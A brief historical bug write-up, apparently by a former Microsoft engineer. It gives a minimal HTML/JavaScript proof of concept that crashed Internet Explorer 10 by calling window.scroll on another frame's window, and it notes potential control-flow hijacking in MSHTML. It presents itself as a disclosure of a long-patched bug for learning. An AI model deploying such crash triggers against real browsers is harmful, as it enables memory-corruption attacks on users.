Calling window.scroll, scrollBy, or scrollTo using .call() with a different frame’s window as the context caused IE10 to crash with a classification of PROBABLY_EXPLOITABLE.

<iframe name="iFrame" width="10" height="10"></iframe>
<input type="button" onclick="main()" value="Crash" />
<script>
function main()
{
    window.scroll.call(iFrame);
}
</script>

The fault occurred in MSHTML!COmWindowProxy::Var_scrollBy, where data from the faulting address was used as the target of a branch — indicating the crash had potential for control-flow hijacking.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.